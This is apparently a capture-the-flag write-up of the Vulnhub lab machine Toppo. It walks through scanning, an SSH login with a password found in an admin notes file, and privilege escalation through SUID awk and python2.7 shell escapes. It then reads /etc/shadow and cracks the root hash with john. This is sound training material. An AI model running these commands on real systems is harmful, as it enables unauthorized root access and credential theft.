infosecwriteups.com

Vulnhub Write-up — Toppo

Yash Anand
3–4 minutes

Yash Anand

This is the write-up of the Machine Toppo from Vulnhub.

DIGEST

Toppo is a beginner friendly machine based on a Linux platform. With the help of note.txt from the admin got the user and exploiting SUID Executables to gain the Root.

Machine Author: Hadi
Machine Type: Linux
Machine Level: Beginner

The IP address is given so no need for netdiscover.

Scanning The Network

nmap -sC -sV 192.168.0.103

Press enter or click to view image in full size

man nmap

Press enter or click to view image in full size

nmap on Toppo

Dirbuster on port 80

Dirbuster Result

Got the notes.txt under admin directory.

Press enter or click to view image in full size

/admin/notes.txt

Above notes gives us the password:- 12345ted123

So let's try to guess the username ted and try to login into ssh.

Own User

Press enter or click to view image in full size

Login into ssh
$whoami ;id

Press enter or click to view image in full size

man whoami ;id

Press enter or click to view image in full size

Own User

Privilege Escalation

I am using this script to find out the privilege escalation methods.

$python -m SimpleHTTPServer

Starting the web server locally to upload the privchecker on the toppo machine.

Press enter or click to view image in full size

Press enter or click to view image in full size

starting python server

Press enter or click to view image in full size

Downloading the privchecker in toppo
$chmod +x linuxprivchecker.py
$ ./linuxprivchecker.py

Running the script on toppo.

Press enter or click to view image in full size

Running privchecker

It will give some way to Escape Sequences, I am trying using awk, you can try any of them.

Press enter or click to view image in full size

Output

Root using awk

$ awk 'BEGIN{system("/bin/sh")}'

Press enter or click to view image in full size

man awk

Press enter or click to view image in full size

Own user using awk

/bin/bash did not give us root, this is because bash has privilege escalation protection. but there is no such thing in /bin/sh.

Get Yash Anand’s stories in your inbox

Join Medium for free to get updates from this writer.

Let's try a different method for Privilege Escalation while searching on the internet I found this article.

Root using python

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

Press enter or click to view image in full size

snap from the above URL

Press enter or click to view image in full size

FInding the perm

python2.7 can exploitable. See the SUID bits

$python2.7 -c “import pty; pty.spawn(‘/bin/sh’);”
Own user using python

Cracking the root password

$awk 'BEGIN{system("cat /etc/shadow")}'

Press enter or click to view image in full size

/etc/shadow file

Press enter or click to view image in full size

finding the hash type using the john
john --wordlist /usr/share/john/password.lst crack --format =sha512crypt
cracking the root password using the john

Own Root

Own root using the password

Press enter or click to view image in full size

FLag

0wnedlab{p4ssi0n_c0me_with_pract1ce}

Thanks for reading! If you enjoyed this story, please click the 👏 button and share to help others! Feel free to leave a comment 💬 below. Have feedback? Let’s connect on Twitter.

❤️ by inc0gnito